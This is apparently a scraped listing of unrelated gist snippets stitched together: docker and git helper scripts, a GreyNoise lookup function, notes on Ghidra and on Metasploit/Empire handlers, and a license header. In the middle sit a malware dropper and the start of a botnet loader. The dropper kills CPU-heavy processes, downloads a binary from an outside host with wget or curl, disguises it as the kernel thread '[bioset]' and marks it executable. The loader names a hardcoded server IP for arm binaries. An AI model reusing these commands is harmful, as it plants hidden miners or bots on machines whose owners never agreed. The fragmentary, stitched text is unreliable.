This gist contains a list of verified Metasploit Meterpreter http(s) handlers and PowerShell Empire http(s) listeners.
Servers could be malicious, or just part of a red teaming action.
export DATADIR=$(pwd)/tkiv-data/
# unquoted list so the loop iterates over each container name
for s in pd1 pd2 pd3 tikv1 tikv2 tikv3; do
docker stop $s
docker rm $s
done
#ifconfig lo0 alias 192.168.1.101
#ifconfig lo0 alias 192.168.1.102
#ifconfig lo0 alias 192.168.1.103
#!/bin/bash
set -e
DEST=$(mktemp -d)
SRC=$(pwd)
pushd .
cd "$DEST"; git clone "$SRC/.git" . >/dev/null 2>&1
cd "$SRC"; git diff -P --cached | patch -p1 -d "$DEST" >/dev/null
#!/bin/bash
DEST=$(mktemp -d)
SRC=$(pwd)
echo "Cloning $SRC into $DEST"
pushd .
cd "$DEST"
git clone "$SRC/.git" .
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
end
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip' | jq '.'
end
This Python script communicates with the Ghidra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.
Currently working on reversing the getPcodePacked command.
Next steps:
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
#!/bin/sh
# Edit
WEBSERVER="209.141.50.26"
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0